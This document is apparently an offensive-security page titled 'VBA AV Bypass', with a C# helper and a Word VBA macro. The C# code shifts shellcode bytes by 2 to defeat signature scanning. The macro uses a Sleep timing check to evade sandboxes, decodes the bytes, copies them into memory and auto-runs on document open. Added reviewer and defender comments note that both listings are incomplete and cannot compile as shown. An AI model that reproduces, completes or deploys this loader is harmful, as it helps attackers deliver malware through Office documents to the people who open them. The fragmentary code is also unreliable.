VBA AV Bypass
vbahelper.exe
using System;
using System.Text;
namespace Helper
{
/// <summary>
/// Console helper that re-encodes a byte array and prints it as a
/// comma-separated list of decimal values.
/// </summary>
/// <remarks>
/// The transform is a fixed additive shift of 2 on every byte (mod 256); no key is involved.
/// It changes the byte pattern a static signature would match on, and nothing else.
/// The consumer has to undo the shift before use, so the original bytes are present in
/// process memory at that point, where a memory scan sees them unencoded.
/// </remarks>
internal class Program
{
/// <summary>Encodes <c>buf</c> and writes the result to standard output.</summary>
/// <param name="args">Command-line arguments; not read by this method.</param>
static void Main(string[] args)
{
// NOTE(review): the declaration of `buf` and the start of its initializer are not in
// this listing; only a five-byte fragment of the array literal survives, so the block
// does not compile as shown.
0xfc,0x48,0x83,0xe4,0xf0};
byte[] encoded = new byte[buf.Length];
for(int i = 0; i < buf.Length; i++)
{
// Add 2 to each byte; the mask keeps the result in 0..255, so 0xFE and 0xFF wrap to 0 and 1.
encoded[i] = (byte)(((uint)buf[i] + 2) & 0xFF);
}
uint counter = 0;
StringBuilder hex = new StringBuilder(encoded.Length * 2);
foreach(byte b in encoded)
{
// Despite the variable name, values are formatted as decimal ("D"), each followed by ", ".
hex.AppendFormat("{0:D}, ", b);
counter++;
if(counter % 50 == 0)
{
// After every 50th value emit "_" and a newline; presumably a VBA line continuation,
// so the output can be pasted into an Array(...) literal.
hex.AppendFormat("_{0}", Environment.NewLine);
}
}
// The printed list ends with a trailing ", " after the last value.
Console.WriteLine("The payload is: " + hex.ToString());
}
}
}
VBA macro that passes AV (the page does not say which product or version was tested)
' Imports Sleep from KERNEL32 so the macro can pause for a number of milliseconds.
' Defender note: a Declare statement that imports a Win32 function inside an Office
' document is visible in the macro source and is a useful static indicator on its own.
Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
' MyMacro: timing check, then decode of an encoded byte array and a byte-by-byte copy
' to a memory address.
' NOTE(review): the listing is incomplete as shown. `buf` and `addr` are never assigned,
' RtlMoveMemory has no Declare statement, and `Next counter` has no matching `For`.
' The missing lines are not reconstructed here.
Function MyMacro()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long
Dim t1 As Date
Dim t2 As Date
Dim time As Long
' Timing check: take the clock before and after a 2000 ms Sleep and compare.
t1 = Now()
Sleep (2000)
t2 = Now()
time = DateDiff("s", t1, t2)
' If fewer than 2 seconds elapsed, the Sleep did not really wait (as when an analysis
' environment skips or shortens sleeps), and the macro exits without doing anything.
' Defender note: Sleep followed by DateDiff and an early Exit is a recognisable pattern
' in macro source, and analysis tooling should not treat the quiet exit as benign.
If time < 2 Then
Exit Function
End If
' Subtract 2 from every element. `i` is not declared, so the module cannot be using
' Option Explicit. No wrap-around is applied here, so an element below 2 would go negative.
For i = 0 To UBound(buf)
buf(i) = buf(i) - 2
Next i
' Copy one decoded value at a time to addr + counter; `res` receives the return value
' and is not checked.
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
End Function
' Word document-open event handler; calls MyMacro when the document is opened with
' macros enabled.
' Defender note: this only fires if macro execution is allowed, so blocking macros in
' files that carry the Mark of the Web stops the chain here.
Sub Document_Open()
MyMacro
End Sub
' Word auto-macro name; a second entry point that calls the same MyMacro routine.
' Defender note: an auto-run entry point together with Win32 Declare statements in one
' document is a stronger signal than either alone.
Sub AutoOpen()
MyMacro
End Sub